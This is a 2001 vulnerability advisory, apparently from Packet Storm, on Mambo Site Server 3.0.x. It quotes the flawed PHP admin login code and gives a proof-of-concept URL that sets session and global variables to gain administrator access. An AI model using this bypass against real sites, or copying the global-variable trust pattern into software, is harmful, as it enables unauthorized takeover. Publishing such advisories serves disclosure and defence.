The Mambo Site Server v3.0.0 - 3.0.5 contains a vulnerability which allows users to gain administrative privileges by changing global variables via URL parsing.
130f26d521cff30052559a9d02cc0b8dd1f05866aefac6e2932959bd6a3d136dSerious security hole in Mambo Site Server version 3.0.X
Jul, 24 2001
by: Ismael Peinado Palomo - postmaster@reverseonline.com
www.reverseonline.com
Summary
Mambo Site Server is a dynamic portal engine and content management tool
based on PHP and MySQL.
Details
Vulnerable systems:
Mambo Site Server version 3.0.0 - 3.0.5
Immune systems:
Impact:
Any user can gain administrator privileges.
Exploits:
Under 'administrator/' dir. we found that index.php checks the user and password:
if (isset($submit)){
$query = "SELECT id, password, name FROM users WHERE username='$myname' AND (usertype='administrator' OR usertype='superadministrator')";
$result = $database->openConnectionWithReturn($query);
if (mysql_num_rows($result)!= 0){
list($userid, $dbpass, $fullname) = mysql_fetch_array($result);
.....
if (strcmp($dbpass,$pass)) {
//if the password entered does not match the database record ask user to login again
print "<SCRIPT>alert('Incorrect Username and Password, please try again'); document.location.href='index.php';</SCRIPT>\n";
}else {
//if the password matches the database
if ($remember!="on"){
//if the user does not want the password remembered and the cookie is set, delete the cookie
if ($passwordcookie!=""){
setcookie("passwordcookie");
$passwordcookie="";
}
}
//set up the admin session then take the user into the admin section of the site
session_register("myname");
session_register("fullname");
session_register("userid");
print "<SCRIPT>window.open('index2.php','newwindow');</SCRIPT>\n";
print "<SCRIPT>document.location.href='$live_site'</SCRIPT>\n";
}
}else {
print "<SCRIPT>alert('Incorrect Username and Password, please try again'); document.location.href='index.php';</SCRIPT>\n";
}
as we can see if the password for administrator matches the one in the database, some variables are registered in the session and we are redirected to index2.php...so lets take a look at index2.php....
if (!$PHPSESSID){
print "<SCRIPT>document.location.href='index.php'</SCRIPT>\n";
exit(0);
}
else {
session_start();
if (!$myname) session_register("myname");
if (!$fullname) session_register("fullname");
if (!$uid) session_register("userid");
}
Here we can see the only verification of a valid user is through the global var. PHPSESSID, so if we declare that variable on the url, and set the 'myname','fullname' and 'userid' we can gain administrative control...so we'll test:
http://target.machine/administrator/index2.php?PHPSESSID=1&myname=admin&fullname=admin&userid=administrator
BINGO!! now we have full administrative privileges...that's a typical example of PHP hacking...it's clear that security can't rely on global variables since they may be modifyed through url parsing.
Ismael Peinado Palomo
Ingeniero Jefe I+D
postmaster@reverseonline.com
www.reverseonline.com
© 2022 Packet Storm. All rights reserved.
%7Cutmcsr%3D(direct)%7Cutmcmd%3D(none)){kind=small}
Follow us on Twitter
Follow us on Facebook
Subscribe to an RSS Feed